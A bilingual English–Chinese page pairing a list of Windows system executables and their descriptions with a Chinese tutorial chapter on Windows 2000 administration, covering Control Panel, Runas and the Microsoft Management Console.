fastopen.exe > Fastopen tracks the location of files on a hard disk and stores the information in memory for fast access. 快速访问在内存中的硬盘文件
faxcover.exe > Fax Cover page editor 传真封面编辑
faxqueue.exe > Display Fax Queue 显示传真队列
faxsend.exe > Fax Wizard for sending faxes 发送传真向导
faxsvc.exe > Starts fax server 启动传真服务
fc.exe > Compares two files or sets of files and their differences 比较两个文件的不同
find.exe > Searches for a text string in file or files 查找文件中的文本行
findstr.exe > Searches for strings in files 查找文件中的行
finger.exe > Fingers a user and displays statistics on that user Finger一个用户并显示出统计结果
fixmapi.exe > Fix mapi files 修复MAPI文件
flattemp.exe > Enable or disable temporally directories 允许或者禁用临时文件目录
fontview.exe > Display fonts in a font file 显示字体文件中的字体
forcedos.exe > Forces a file to start in dos mode. 强制文件在DOS模式下运行
freecell.exe > Popular Windows Game 空当接龙
ftp.exe > File Transfer Protocol used to transfer files over a network connection 就是FTP了
gdi.exe > Graphic Device Interface 图形界面驱动
grovel.exe >
grpconv.exe > Program Manager Group Convertor 转换程序管理员组
help.exe > displays help for Windows 2000 commands 显示帮助
hostname.exe > Display hostname for machine. 显示机器的Hostname
ie4uinit.exe > IE5 User Install tool IE5用户安装工具
ieshwiz.exe > Customize folder wizard 自定义文件夹向导
iexpress.exe > Create and setup packages for install 穿件安装包
iisreset.exe > Restart IIS Admin Service 重启IIS服务
internat.exe > Keyboard Language Indicator Applet 键盘语言指示器
ipconfig.exe > Windows 2000 IP configuration. 察看IP配置
ipsecmon.exe > IP Security Monitor IP安全监视器
ipxroute.exe > IPX Routing and Source Routing Control Program IPX路由和源路由控制程序
irftp.exe > Setup FTP for wireless communication 无线连接
ismserv.exe > Intersite messaging Service 安装或者删除Service Control Manager中的服务
jdbgmgr.exe > Microsoft debugger for java 4 Java4的调试器
jetconv.exe > Convert a Jet Engine Database 转换Jet Engine数据库
jetpack.exe > Compact Jet Database. 压缩Jet数据库
jview.exe > Command-line loader for Java Java的命令行装载者
krnl386.exe > Core Component for Windows 2000 2000的核心组件
label.exe > Change label for drives 改变驱动器的卷标
lcwiz.exe > License Compliance Wizard for local or remote systems. 许可证符合向导
ldifde.exe > LDIF cmd line manager LDIF目录交换命令行管理
licmgr.exe > Terminal Server License Manager 终端服务许可协议管理
lights.exe > display connection status lights 显示连接状况
llsmgr.exe > Windows 2000 License Manager 2000许可协议管理
llssrv.exe > Start the license Server 启动许可协议服务器
lnkstub.exe >
locator.exe > RPC Locator 远程定位
lodctr.exe > Load perfmon counters 调用性能计数
logoff.exe > Log current user off. 注销用户
lpq.exe > Displays status of a remote LPD queue 显示远端的LPD打印队列的状态，显示被送到基于Unix的服务器的打印任务
lpr.exe > Send a print job to a network printer. 重定向打印任务到网络中的打印机。通常用于Unix客户打印机将打印任务发送给连接了打印设备的NT的打印机服务器。
lsass.exe > LSA Executable and Server DLL 运行LSA和Server的DLL
lserver.exe > Specifies the new DNS domain for the default server 指定默认Server新的DNS域
macfile.exe > Used for managing MACFILES 管理MACFILES
magnify.exe > Used to magnify the current screen 放大镜
makecab.exe > MS Cabinet Maker 制作CAB文件
mdm.exe > Machine Debug Manager 机器调试管理
mem.exe > Display current Memory stats 显示内存状态
migpwd.exe > Migrate passwords. 迁移密码
mmc.exe > Microsoft Management Console 控制台
mnmsrvc.exe > Netmeeting Remote Desktop Sharing NetMeeting远程桌面共享
mobsync.exe > Manage Synchronization. 同步目录管理器


Windows 2000 的基本管理

《一键清理系统垃圾》

Windows 2000 的基本管理

不要以管理权限登录，以普通用户登录，并在执行管理任务时使用 Runas 命令，特别是当服务器与因特网连接的时候，因为以管理员身份运行 Windows 2000 使系统易受特洛伊木马和其他安全性威胁的侵害。访问 Internet 站点的简单操作也可能对系统产生非常大的破坏。
本章主要介绍基本管理功能：

4.1 管理工具
    在Windows 2000 Server 中主要利用控制面板、管理控制台、系统工具、Resouce Kit 及其它支持工具实现管理操作。

4.1.1 控制面板
    控制面板（如图4.1）提供了对计算机系统的普通设置方法。
§　辅助功能
    Windows 2000 包含的辅助功能工具是为有特殊需要的用户提供最低级功能而设计的。大多数残疾人士在日常使用中都需要功能更好的实用程序。

§　添加/删除硬件
    每个设备都有自己唯一的设备驱动程序，它一般由设备制造商提供。但是，某些驱动程序是 Windows 2000 提供的。用户可以通过控制面板中的"添加/删除硬件"向导或设备管理器来配置设备。但需要注意的是用户必须以管理员或管理员组成员的身份登录，才能使用"控制面板"或"设备管理器"中的"添加/删除硬件"向导配置设备。如果用户的计算机连接到网络上，那么网络策略设置可能也会阻止用户安装硬件。另外用户如果要同时更新所有驱动程序，请使用"Windows Update"。
    在 Windows 2000 下安装即插即用设备非常容易。只需将该硬件接入然后让 Windows 2000 去完成其余的工作，包括安装必要的驱动程序、更新系统并分配资源。通过即插即用，用户大可放心，任何新设备都将正常协同工作，而且在安装或拆除硬件后用户的计算机可正确重新启动。即插即用还能在计算机启动时识别出任何新硬件并加载硬件设备所需的任何驱动程序。安装或拆除硬件设备时，即插即用与 Windows 2000 的电源选项一同使用，以管理硬件和外围设备的电源需求，并在不使用时关闭电源或进入节能模式。而且，如果在安装或拆除设备时用户正在其他程序中工作，即插即用功能将通知用户计算机配置将要更改并提醒用户保存所做的工作。为充分使用即插即用功能，必须使用高级配置和电源接口 (ACPI) 计算机，运行在 ACPI 模式，而且硬件设备必须支持即插即用。在 ACPI 计算机中，由操作系统而不是硬件配置和监视该计算机。由于"即插即用"的功能使用，使用户能够更为轻松的安装和删除硬件设备。

高级配置和电源接口 (ACPI) 是一个开放的工业规范，它为系统插件板定义了灵活的、可扩展的硬件接口。软件设计人员使用该规范来集成整个计算机系统（包括硬件、操作系统和应用程序软件）的电源管理功能。此集成允许 Windows 2000 决定哪些应用程序是活动的并处理计算机子系统和外围设备的所有电源管理资源。ACPI的作用在于：
  §　ACPI 能够使操作系统在便携机、台式机、服务器和外围设备等很宽的范围上进行电源管理。
  §　ACPI 是 OnNow 产业主导性的基础，它允许系统生产商交付的计算机只需在键盘上按一个键就可启动。
  §　ACPI 设计对于充分体现 Windows 2000 中的电源管理和即插即用的优势是必要的。如果用户不能确定用户的计算机是否兼容 ACPI，请检查制造商的文档。更改利用 ACPI 的电源设置，请使用"控制面板"中的"电源选项"。

§　添加/删除程序
    "添加/删除程序"可以帮助用户管理计算机上的程序。它提示用户通过必要的步骤添加新程序或更改、删除已有的程序。用户可以使用"添加/删除程序"，来添加选中的不包括在初始安装中的 Windows 2000 组件及 Internet 上的 Windows 更新和新特性。
§　日期/时间
    用于更改计算机的日期、时间及相应的时区，并且如果希望夏时制时间更改时自动调整计算机时钟，请选择"根据夏时制自动调节时间"复选框。

§　显示
    使用"控制面板"中的"显示"可自定义桌面和显示设置。这些设置控制了桌面的外观和监视器显示信息的方式。用户可以自定义屏幕上 Windows 中使用的颜色和字体。用户还可以将图片、图案或 HTML 文档设置为墙纸，或者设置带密码的屏幕保护程序来保护用户的工作。可以采用视觉效果平滑字体或者增强打开和关闭菜单和文件命令时的其外观显示。用户还可以更改计算机的显示设置。用户可以指定监视器的颜色设置、更改屏幕分辨率以及设置刷新频率。如果用户正使用多个监视器，则可以为每个显示指定单独的设置。
    在自定义桌面的过程中，用户可以使用 Windows 2000 中新的效果方式，包括"动画显示菜单和工具提示"启用动画，例如 "使用大图标"增大代表文件、文件夹和快捷方式的图标的大小等。
    Windows 2000 具有新的多监视器功能，可以通过扩展桌面的大小来提高工作效率。最多可连接十个监视器，用户可以创建一个足以容纳许多程序或窗口的大桌面。 通过将一个项目在监视器间移动或将它们拉伸到多个监视器中，用户可以从容地同时在多个任务中工作。用户可以在查看一个监视器中的 Web 活动的同时，编辑其他监视器中的图像或文本。或者，用户可以打开一个长文档中的多页，将其跨监视器拖动以便于查看文本或图形的布局。用户还可以将 Microsoft Excel 电子表格拉伸到两个监视器，以便于查看多个列而无需滚动。启动计算机时，有一个监视器作为主显示器并显示登录对话框。另外，大多数程序窗口在最初打开程序时都将显示在主监视器上。可为每个监视器设置不同的分辨率和颜色数。多个监视器可被连接到各自的图形适配器，或者支持多个输出的单个适配器。

请注意：要使用多监视器支持特性，每个监视器都需要一块 PCI 或 AGP 视频适配卡。如果用户的计算机主板自带视频适配器（集成在主板上，而不是扩展槽上的插卡），而用户又想使用多监视器配置，则必须将其设置为 VGA 模式。
    下面安装和使用多监视器的一些常用操作：
    安装附加的监视器
步骤1 关闭计算机。
步骤2 将其他的 PCI（外围元件互连接口）或 AGP（加速图形端口）视频适配器插入到可用的插槽中。
步骤3 将附加的监视器信号线插入视频卡接口。
步骤4 打开计算机。Windows 2000 将检测新的视频适配器并安装适当的驱动程序。
步骤5 在"控制面板"中打开"显示"。
步骤6 在"设置"选项卡上，单击代表除主监视器之外还需要使用的监视器图标。
步骤7 选中"将 Windows 桌面扩展到该监视器上"复选框，然后单击"应用"或"确定"。
    更改主监视器
步骤1 在"控制面板"中打开"显示"。
步骤2 在"设置"选项卡中，单击要代表指派为主监视器的监视器图标。
步骤3 选中"使用该设备作为主监视器"复选框。

在监视器之间移动项目
步骤1 在"控制面板"中打开"显示"。
步骤2 在"设置"选项卡上，单击"标识"，在每台监视器上显示一个较大的数字，显示监视器与每个图标的对应关系。
步骤3 单击监视器图标并将图标拖曳到代表要将项目从一台监视器移动到另一台监视器的方式的位置，然后单击"确定"或"应用"。
步骤4 在屏幕上拖曳桌面上的项目，直到该项目出现在另一台监视器上。
步骤5 也可以调整窗口的大小，使其跨越多台监视器。
    在多台监视器中查看同一桌面
步骤1 在"控制面板"中打开"显示"。
步骤2 在"设置"选项卡上，单击代表除主监视器之外还需要使用的监视器图标。
步骤3 选取"将我的 Windows 桌面扩展到此监视器上"复选框。
§　传真
    使用"传真"传真文本文档或图形图像的方便程度就象在基于 Windows 程序的打开文档中单击"打印"一样。传真支持扫描的图像，在传真前会自动将图形转换成 .tif 文件格式。用户也可以使用邮件程序同时发送电子邮件和传真信息。安装了传真设备后，请单击"开始"菜单中的"程序"，再单击"附件"中的"通讯"，然后单击"传真"来查看每个可用的传真命令。

具体命令如下：

传真队列 查看、取消、继续或暂停发送的传真。
传真服务管理 设置传真设备接收传真；设置安全权限；设置传真应答前响铃的次数以及传真发送中断前重试的次数。
我的传真 查看、打印或删除发送和接收的传真。该文件夹也存储所有的封面。
发送首页传真 只传真封面。该命令访问"发送传真向导"。

§　文件夹选项
    "文件夹选项"使用户能够改变桌面和文件夹内容的外观、并可以指定打开文件夹的方式。例如，用户可以选择在打开所选文件夹内的文件夹时，是打开一个窗口还是层叠窗口。另外，用户可以指定文件夹的打开是通过单击鼠标还是双击鼠标来实现。 也可以使用"文件夹选项"打开"活动桌面"或在文件夹中显示超链接文本（"常规"选项卡）、更改打开某些类型文件（"文件类型"选项卡）的程序，或者在没有连接到网络时使文件可用（"脱机文件"选项卡）。用户在"文件夹选项"中进行的更改会应用到 "Windows 资源管理器"（包括"我的电脑"、"网上邻居"、"我的文档"和"控制面板"）窗口目录的外观。但是，"文件夹选项"设置不在文件夹工具栏中应用。
    在 Windows 2000 中实现了"脱机文件"功能。使用脱机文件，即使没有连接到网络也可以继续处理网络文件和程序。如果断开与网络的连接或移除便携式计算机，指定为可以脱机使用的共享网络条目与连接到网络时完全相同。可以象通常一样继续处理。对这些文件和文件夹的访问权限与连接到网络时相同。当连接状态变化时，"脱机文件"图标将出现在状态区中，状态区上会显示提示信息，通知用户这一变化。网络连接恢复或插接便携式计算机时，所有脱机时所作的更改均将更新到网络上。用户和网络上的其他人对同一文件作出更改时，用户可以选择将用户的文件版本保存到网络、保留其他版本或两个版本均保存。具体启用"脱机文件"功能的步骤如下：
    步骤1　打开"我的电脑"。
    步骤2　在"工具"菜单上，单击"文件夹选项"。
    步骤3　在"脱机文件"选项卡上，确保选中了"启用脱机文件"复选框。
    步骤4　选中"注销前同步所有脱机文件"以便进行完全同步。清除该选项则进行快速同步。

    注意：完全同步可以确保获得每个指定为可以脱机使用的网络文件的最新版本。快速同步可以确保获得所有脱机文件的完整版本，却未必是最新版本。 在默认情况下，Windows 2000 Professional 选中"启用脱机文件"复选框，而 Windows 2000 Server 不选中该复选框。即使计算机配置为使用"脱机文件"，仍必须选择要指定为可以脱机使用的网络文件和文件夹。要查看可以脱机使用的所有网络文件列表，请在"脱机文件"选项卡上单击"查看文件"。
§　字体
    字体用于在屏幕上显示文本和打印文本。在 Windows 2000 中，字体是字样的名称。字体有如斜体、黑体和黑斜体等字形。 Windows 2000 提供三种基本字体技术：
轮廓字体
    TrueType 和新的 OpenType 字体是由直线和曲线命令生成的轮廓字体。OpenType 是 TrueType 的一种扩展。两者都可以缩放和旋转。Windows 2000 支持外观优美的所有尺寸和所有输出设备。Windows 2000 允许选择 OpenType 字体。Windows 2000 也附带了亚洲 OpenType 字体的 CD-ROM 集合，用户可以安装它来查看或打印亚洲文档和 Web 页面。
矢量字体
    支持矢量字体是因为许多程序仍然依赖这些字体。矢量字体是从数学模型生成的。它们主要用于图形显示器。Windows 2000 支持三种矢量字体。

光栅字体
    支持光栅字体是因为许多程序仍然依赖这些字体。光栅字体存储在位图文件中，通过在屏幕或纸张上显示一系列的点来创建。Windows 2000 支持五种光栅字体。
§　红外和无线链接
    Windows 2000 支持 IrDA 协议，该协议允许数据在红外连接上传送。这提供一个基础结构，此结构允许其他设备和程序通过 IrDA 接口与 Windows 2000 通讯。Windows 2000 安装了"无线链接"程序，它与运行 Windows 2000 或 Windows 98 操作系统的计算机互相传送文件。Windows 2000 即插即用结构可以为内嵌 IrDA 硬件的计算机自动检测并安装红外组件。对于没有内置 IrDA 硬件的计算机，用户可以将串行 IrDA 收发器连接到 COM 端口，并使用 Windows 2000 中的"添加/删除硬件"向导安装设备。安装红外设备后，"控制面板"中会出现"无线链路"图标。当其他 IrDA 收发器进入有效范围时，"无线链路"图标出现在桌面和任务栏上。然后可以使用下列任意操作通过红外连接发送文件：
  §　使用"无线链路"对话框指定位置和一个或多个文件。
  §　使用拖放操作将文件移动到桌面的"无线链路"图标上。
  §　右键单击在桌面、"Windows 资源管理器"或者"我的电脑"中选择的任何文件，然后单击"发送到红外接收器"命令。
  §　打印到配置使用红外端口的打印机。

  §　消息队列
    控制面板中的"消息队列"允许用户设置该计算机的消息队列的某些属性。消息队列是 Windows 2000 操作系统的通讯基础，并且是为 Windows 2000 操作系统创建分布式消息传递应用程序的开发工具。这些应用程序可以通过不同种类的网络进行通讯，也可以与可能脱机的计算机通讯。消息队列提供了有保障的消息传递、有效的路由选择、安全性、事务处理支持以及基于优先级的消息传递。可以使用控制面板中的消息队列工具执行消息队列的以下本地管理任务：
  §　指定该计算机上要存储消息和日志文件的磁盘驱动器和文件夹。
  §　管理该计算机的用户证书，并查看 Active Directory 中的所有用户证书。
  §　更新该计算机的密钥。
  §　与运行 Windows NT 4.0 的 MSMQ 1.0 控制器服务器通讯时，请指定是否使用服务器身份验证。
  §　如果用户使用的是便携式计算机，请指定用于转发消息的新 Windows 2000 站点。
  §　更改并查看本地服务器的服务器证书。
§　关于网络和拨号连接
    网络和拨号连接提供用户的计算机与 Internet、网络或另一台计算机之间的连接。通过网络和拨号连接，无论物理上位于网络所在的位置还是在远程位置，都可以访问网络资源和功能。连接是在网络和拨号连接文件夹内建立、配置、存储和进行监视的。

"网络和拨号连接"文件夹中的每个连接均包含一组功能，可以用来在用户的计算机与另一计算机或网络之间建立链接。传出连接通过使用已经配置的访问方法（LAN、调制解调器、ISDN 线路等等）来访问远程访问服务器，从而建立与网络之间的连接。相反的，传入连接能够使运行 Windows 2000 Professional 的计算机或运行 Windows 2000 Server 的单独的计算机被其他计算机访问。这意味着用户的计算机可以充当远程访问服务器。无论用户的计算机是通过本地 (LAN)、远程（拨号、ISDN 等等），还是两者进行连接，都可以配置任何连接，使之执行需要的任何网络功能。例如，用户可以打印到网络打印机、访问网络驱动器和文件、浏览其他网络，或者访问 Internet。Windows 2000 登录和域安全、对安全主机的支持、数据加密、身份验证，以及回拨都为网络和拨号连接提供了安全的网络访问。
§　调制解调器
    调制解调器支持是由 Windows 2000 中的 TAPI Unimodem 5 服务提供程序提供的，它使你可以安装并使用当今几乎所有类型的调制解调器。调制解调器被随同 Windows 2000 安装的程序（如超级终端、"网络和拨号连接"、电话拨号程序和传真），以及被其他 Windows 2000 兼容的产品（包括为了访问 Internet 服务提供商而需要使用的软件）使用。
§　电源选项
    使用"控制面板"中的"电源选项"，可以降低任意个计算机设备或整个系统的电耗。通过选择电源方案可以实现电源管理，电源方案就是计算机管理电源使用情况的一组设置。用户可以创建自己的电源使用方案，或者使用 Windows 2000 提供的方案。也可以调整电源方案中的单个设置。

例如，根据硬件，可以：
  §　自动关闭监视器和硬盘以节省电能。
  §　当计算机空闲时将其置于等待状态。在等待状态时整个计算机将切换到低能耗状态，在这种状态下设备（例如监视器和硬盘）将关闭，并且计算机使用更少的电能。想重新使用计算机时，它将快速退出等待状态，而且桌面精确恢复到进入等待时的状态。尤其对于保存便携机上的电池能量，等待功能非常有用。因为待机状态并没有将桌面状态保存到磁盘，待机状态时的电源故障可能会丢失未保存的信息。
  §　使计算机进入休眠状态。休眠特性关闭监视器和硬盘，并将内存中的所有内容保存到硬盘，然后关闭计算机。重新启动计算机时，桌面精确地恢复为用户离开时的状态。计算机退出休眠状态比退出等待状态需要的时间长。
§　打印
    使用 Windows 2000，用户可以在整个网络上共享打印机资源。不同计算机和操作系统的客户，可以通过 Internet 将打印作业发送到直接连接 Windows 2000 打印服务器的打印机，或者使用内部或外部网卡连接到网络或其他服务器的打印机。Windows 2000 支持几种高级打印功能。例如，用户可以管理网上任何地方的 Windows 2000 打印服务器。另一高级特性是，不必在 Windows 2000 客户机上安装打印机驱动程序就可以使用打印机。该驱动程序在客户连接到 Windows 2000 打印服务器时自动下载。

那么在 Windows 2000 中，在安装、使用和管理打印机时添加的新特性包括：
  §　打印设置
  §　打印管理
  §　Internet 打印
  §　目录服务
  §　标准端口监视器
  §　打印队列监视
  §　用户设置
  §　从应用程序打印
    对于打印系统的配置与管理用户将在第八章"文件和打印系统的配置与管理"中作详细的介绍。
§　区域选项
    通过"控制面板"中的"区域选项"，可以更改 Windows 2000 显示日期、时间、货币、大数字和带小数点数字的方式。也可以选择公制或者美国的度量制。
§　扫描仪和照相机
    在安装第一个扫描仪或数字相机时，将在"控制面板"中显示"扫描仪和照相机"图标。然后可以使用"扫描仪和照相机"特性安装其他扫描仪、数字静态相机、数字视频相机和图像捕捉设备。设备安装后，"扫描仪和照相机"图标即可将该设备链接到计算机中的某程序。例如，当按下扫描仪上的"扫描"按钮时，可以使已扫描的图片在用户需要的程序中自动打开。

§　任务计划程序
    使用任务计划程序，用户可以安排任何脚本、程序或文档在最方便的时候运行。每次启动 Windows 2000 时，任务计划程序也会启动，并在后台运行。使用任务计划程序可以完成以下任务：
  §　计划让任务在每天、每星期、每月或某些时刻（如系统启动时）运行。
  §　更改任务的计划。
  §　停止计划的任务。
  §　自定义任务如何在计划的时间运行。
§　声音和多媒体
    使用"控制面板"中的"声音和多媒体"可以将声音指派给某些系统事件。系统事件可以在很多情况下发生。例如：当计算机程序执行任务或遇到与执行任务有关的问题时。
§　系统
    使用"控制面板"中的"系统"执行以下任务：
  §　查看并更改控制计算机如何使用内存以及查找特定信息的设置。
  §　查找有关硬件和设备属性的信息，还可配置硬件配置文件。
  §　查看有关计算机连接和登录配置文件的信息。

图4.2 "系统"属性

    可以更改控制计算机如何使用内存的性能选项，包括页面文件大小、注册表大小，或告诉计算机在哪可找到某些类型信息的环境变量。启动和故障恢复选项表示启动计算机时将使用的操作系统以及系统意外终止时将执行的操作。 有关硬件和设备的信息也可以在"系统"中找到。使用硬件向导安装、卸载，或配置硬件。设备管理器显示计算机上安装的设备并允许更设备属性。还可以为不同的硬件配置创建硬件配置文件。使用"系统"，可以查看网络和登录信息，如计算机名或 DNS 域名。还可以查看域或工作组成员的详细信息，或者启动网络识别向导并连接到网络。用户配置文件包含与登录配置关联的个人设置。
    注意：必须以管理员身份登录本地计算机或具有适当的网络特权才能对"系统"进行某些更改。

4.1.2 系统工具
    如图4.3显示了 Windows 2000 Server 的系统配置管理工具。
    在安装盘中还提供了 Resource Kit 工具，这个工具集主要用于系统的开发，涉及到许多 Windows 2000 底层的知识，在此不做展开了。

    同时还提供了一个支持工具集如图 4.4 所示，提供了一些辅助系统管理的使用工具。
    配置服务器为用户配置服务器的各项功能和服务提供了一个统一的入口，让用户更方便配置和管理服务器。
    同时在安装盘中还提供了一些由第三方厂商开发的，尚未经过完全测试的管理工具，如 Phone Bool Administration ,如果有兴趣大家不妨一试。

4.1.3 其它组件
    在安装 Windows 2000 Server 时用户并不是将所有的功能组件全部安装，为了进一步扩展服务器的功能，用户可以选择安装其它组件，以下列出了在 Windows 2000 Server 中所包含的所有组件：
    Active Directory、AppleTalk 网络集成、证书服务、连接点服务、DHCP 服务、磁盘碎片整理程序、磁盘管理、磁盘配额、分布式组件对象模式、分布式文件系统 (DFS)、DNS 服务、容错、组策略、安装和升级、Internet 验证服务、网际协议安全、授权、管理安全模板、消息队列、调制解调器、监视性能、网络和拨号连接、网络监视器、Novell NetWare 集成、打印、QoS 许可控制服务、远程安装服务、远程存储、可移动存储、路由和远程访问、安全配置和分析、智能卡的安装、SNMP 服务、任务计划程序、TCP/IP、电话服务、终端服务、虚拟专用网络、Windows ATM 服务、Windows 备份、Windows 安装程序、WINS 服务。

4.1.4 使用 Runas 命令启动程序
    用户不应该将自己添加到 Administrators 组，而应该在以管理员身份登录时避免运行计算机。大多数计算机活动，都以 Users 组或 Power Users 组成员的身份登录。如果需要执行只有管理员才能进行的任务，可以以管理员身份登录，然后在执行任务后注销。应该将自己添加到 Users 组或 Power Users 组中。以 Users 组成员身份登录时，用户可以执行日常任务，包括运行程序和访问 Internet 站点，以防止计算机遭受不必要的风险。作为 Power Users 组的成员，用户可以执行日常任务，也可以安装程序、添加打印机以及使用"控制面板"中的大部分项目。如果用户需要执行管理任务，例如升级操作系统或配置系统参数，请先注销再以管理员身份登录。如何使用 Runas 命令启动程序呢？
    步骤1 在"Windows 资源管理器"中，单击程序、Microsoft 管理控制台 (MMC) 工具或要打开的"控制面板"项。
    步骤2 按 SHIFT 并右键单击该程序，然后单击"运行方式"。

    步骤3 单击"以下面的用户身份运行程序"。
    步骤4 键入用户名、密码以及要使用的管理员帐户所属的域。如下图 4.5 所示

注意：
  §　"运行方式"允许用户运行程序 (*.exe)、保存的 MMC 控制台 (*.msc)、程序以及保存的 MMC 控制台的快捷方式及"控制面板"项。作为另一个组（例如 Users 组或 Power Users 组）的成员登录到计算机时，用户可以以管理员的身份运行。
  §　虽然没有限制"运行方式"只能由管理员帐户使用，但通常还是以管理员身份使用"运行方式"来运行程序。任何拥有多个帐户的用户均可以使用"运行方式"来运行使用备用凭据的程序、MMC 控制台或"控制面板"项。
  §　有些项目（例如"Windows 资源管理器"、"打印机"文件夹和桌面项）由 Windows 2000 间接打开。这些项目不能使用"运行方式"启动。

4.2 Microsoft 管理控制台
    在微软近几年推出的软件中用户已经开始接触到管理控制台如 IIS、Proxy 等，只不过适用于单项功能的管理。而在 Windows 2000 Server 中，管理控制台已经成为了所有管理工具的统一平台。用户可以使用 Microsoft Management Console (MMC) 创建、保存或打开管理工具（称为 MMC 控制台）来管理硬件、软件和 Windows 系统的网络组件。MMC （如图4.6） 是 Windows 2000 操作系统的一个特性，但也可以在 Windows NT、Windows 95 和 Windows 98 操作系统上运行 MMC。另外，MMC 是许多设计在 Windows 上运行的软件程序的特性。
    需要在此明确的是 MMC 不执行管理功能，但它集成了所有的管理工具。可以添加到控制台的主要工具类型称为管理单元，其他可添加的项目包括 ActiveX 控件、指向 Web 页的链接、文件夹、任务板视图和任务。
    使用 MMC 有两种常规方法：在用户模式中，用已有的 MMC 控制台管理系统；在作者模式中，创建新控制台或修改已有的 MMC 控制台。

如图4.6所示，新建的 MMC 控制台由分成两个窗格的窗口组成。左边的窗格包括两个选项卡："树"选项卡和"收藏夹"选项卡。右边的窗格包括详细资料窗格。"树"选项卡，也称为控制台树，列出给定控制台中可用的项目。详细资料窗格列出这些项目的信息和有关功能。随着单击控制台树的不同项目，详细资料窗格中的信息也将变化。详细资料窗格可以显示不同信息，包括 Web 页、图形、图表和列。每个控制台都有自己的菜单和工具栏，和主 MMC 窗口的菜单和工具栏分开，这有利于用户执行任务。

4.2.1 作者模式的管理控制台
    MMC 窗口
    MMC 控制台组件包含在 MMC 窗口中。该窗口有许多菜单和一个工具栏，提供打开、创建和保存 MMC 控制台的命令。MMC 窗口上的菜单和工具栏分别称为主菜单栏和主工具栏。另外，在窗口的底部还有状态栏，详细资料窗格顶部有说明栏。打开 MMC 以查看 MMC 窗口。当打开新建的 MMC 控制台时，控制台窗口出现在 MMC 窗口中的工作区里。在控制台窗口中，可以组织和配置新控制台，然后使用控制台中的工具。将项目添加到控制台之后，可以隐藏主菜单栏、主工具栏、说明栏和状态栏，防止用户对控制台做不必要的更改。
    管理单元
    管理单元是 MMC 控制台的基本组件。管理单元总在控制台中，但不能自己运行。当安装了一个组件，在运行 Windows 的计算机上有与之关联的管理单元的时候，管理单元对于任何在该计算机上创建控制台的人员都可用（除非受用户策略的限制）。如图4.7

MMC 支持两种类型的管理单元：独立管理单元和扩展管理单元。
§　管理单元:可以将独立管理单元(通常称为管理单元)添加到控制台树中，而不用先添加另外的项目。
§　扩展管理单元:通常称为扩展，一般添加到已有独立或扩展的管理单元的控制台树。当启用管理单元的扩展时，它们操作由管理单元控制的对象，如计算机、打印机、调制解调器或其他设备。
    将管理单元或扩展添加到控制台时，它可能显示为控制台树的新项目，或者可能将文本菜单项、附加工具栏、附加属性页或向导添加到已安装在控制台的管理单元中。可以将单个管理单元或多个管理单元及其他项目添加到控制台中。另外，可以将多个特定管理单元的实例添加到同一个控制台来管理不同的计算机或修复损坏的控制台。每次向控制台添加新的管理单元实例时，该管理单元的所有变量都按默认值设置，直到配置了该管理单元。例如，如果先配置一个特定的管理单元来管理远程计算机，然后又添加该管理单元的第二个实例，那么并不自动配置第二个实例来管理远程计算机。通常，用户只能添加安装在用来创制控制台的计算机上的管理单元。然而，在 Windows 2000 中，如果计算机是域的一部分，便可以使用 MMC 下载任何本地还没有安装的管理单元，但必须是在 Active Directory 目录服务中可用。

任务板视图和任务
    任务板视图是能添加控制台详细资料窗格视图的页面，也是指向给定控制台之内和之外功能的快捷方式。可以使用这些快捷方式运行任务，如启动向导、打开属性页、执行菜单命令、运行命令行和打开 Web 页。可以配置任务板视图，以便包含给定用户可能需要的所有任务。另外，可以在控制台中创建多个任务板视图，这样可以按功能或用户对任务分组。
控制台目录树和控制台根节点
§　控制台目录树
    MMC 控制台的左边窗口里的控制台树是一个层次结构。控制台树显示控制台中可以使用的项目。这些项目包括文件夹、管理单元、控件、Web 页以及其他一些工具。打开 MMC 以查看新控制台的控制台树。在新控制台里，控制台树上的唯一一项是标记为控制台根节点的文件夹。可以通过向控制台添加项目来创建控制台的管理功能。不需要在控制台根节点建立控制台窗口，可以在控制台树的任何项目上建立控制台窗口。这隐藏了控制台树中根节点以上的项目，并且着重于新控制台根节点上的窗口和下面的管理工具。§　控制台树上的树枝
    树枝是控制台树中添加了对象的任何项目。可以单击加号来展开某个树枝并查看其内容，单击减号标记来折叠树枝。可见树枝是一个文件夹，可用来将控制台树上的相关项组合在一起。但是，还可使用 MMC 将工具添加到项目而不是文件夹，然后它也变成树枝。控制台树根节点是一个树枝；它的功能只是包含控制台树。管理单元顶部的项目通常是文件夹或其他树枝。另外一种可以容纳其他项目的项是可查看项目。当单击可查看项目时，它会在详细资料窗格中而不是在附加项中显示列表、文本或图形信息。Web 页是可查看项目，因为它们需要浏览器，只有在详细资料窗格中才能打开。不应当向可查看项目添加项目，因为如果某个用户隐藏了控制台树，他们可能就不知道某个可查看项目中包含其他项目。相反，如果有可查看项目集合，便可以向控制台树中添加文件夹并把文件夹中的可查看项目组合起来。然后当控制台树被隐藏起来时，用户就可以从所有的项目中选择。
    种不能包含其他项的项目类型是树叶。单击某个树叶时，它便在详细资料窗格中列出所有项目。一般地，这些是单独包含在控制台树上的项目。然而，当项目的数量成百上千时，管理单元使用树叶而不是树枝。

收藏夹列表
    收藏夹列表位于新 MMC 控制台的左边窗格的"收藏夹"选项卡上。如果以作者模式打开控制台，或已将项目添加到控制台的收藏夹列表中，那么将自动出现该选项卡。
    可以使用收藏夹列表来创建指向控制台树中项目的快捷方式。为了方便，可以添加指向经常使用工具的快捷方式，或者添加指向控制台树中许多级以下工具的快捷方式。还可以使用收藏夹列表来便于初学用户更容易地完成任务。例如，可以创建一个控制台，其收藏夹列表中只包含指向某些控制台树项目的快捷方式，这些控制台树项目是所给用户需要执行的作业。然后可以隐藏控制台树来进一步简化视图。还可以使用收藏夹列表来整理任务板视图。例如，一个复杂的控制台可能有多个任务板视图，分布在控制台树中的多个项目中。但是，可以将所有这些任务板视图添加到收藏夹列表，这样用户就可以从一个位置访问它们。

控制台访问选项
    创建自定义控制台时，可以给控制台指派两种常用访问选项中的一种：作者模式或用户模式。依次有三个级别的用户模式，因此共有四种默认访问控制台的选项如图4.8：
  §　作者模式
  §　用户模式－完全访问
  §　用户模式－受限访问，多窗口
  §　用户模式－受限访问，单窗口
    可以在 MMC 中的"选项"对话框中配置这些选项。有关打开该对话框的指导，请参阅设置 MMC 控制台选项。

    可以给控制台分配作者模式以便向所有 MMC 功能授予完全访问权限，包括能添加或删除管理单元、创建新窗口、创建任务板视图及任务、向收藏夹列表添加项目，以及查看控制台树的所有部分。通过选择一种用户模式选项，排除用户可能不需要的创作功能。例如，如果分配"用户模式－完全访问"选项给控制台，那么将提供所有窗口管理命令和完全访问控制台，但是能防止用户添加或删除管理单元，或者更改控制台属性。
